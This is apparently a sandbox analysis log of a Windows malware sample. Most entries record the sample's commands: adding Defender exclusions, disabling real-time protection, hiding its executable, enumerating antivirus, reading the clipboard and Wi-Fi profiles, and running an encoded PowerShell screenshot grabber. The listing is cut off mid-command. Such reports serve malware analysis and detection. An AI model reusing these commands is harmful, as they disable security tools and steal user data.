                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:22:27:20
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:22:27:21
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:22:27:21
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\attrib.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                                                  Imagebase:0x7ff7e2370000
                                                  File size:23'040 bytes
                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:22:27:21
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:22:27:21
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tasklist.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:tasklist /FO LIST
                                                  Imagebase:0x7ff78fca0000
                                                  File size:106'496 bytes
                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                  Imagebase:0x7ff6f5d40000
                                                  File size:576'000 bytes
                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tasklist.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:tasklist /FO LIST
                                                  Imagebase:0x7ff78fca0000
                                                  File size:106'496 bytes
                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:22:27:22
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:49
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:50
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                  Imagebase:0x7ff68db70000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:51
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tree.com
                                                  Wow64 process (32bit):false
                                                  Commandline:tree /A /F
                                                  Imagebase:0x7ff65f020000
                                                  File size:20'992 bytes
                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:52
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:53
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell Get-Clipboard
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\netsh.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:netsh wlan show profile
                                                  Imagebase:0x7ff7a73e0000
                                                  File size:96'768 bytes
                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\systeminfo.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:systeminfo
                                                  Imagebase:0x7ff649bf0000
                                                  File size:110'080 bytes
                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:56
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\tasklist.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:tasklist /FO LIST
                                                  Imagebase:0x7ff78fca0000
                                                  File size:106'496 bytes
                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:57
                                                  Start time:22:27:23
                                                  Start date:20/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAG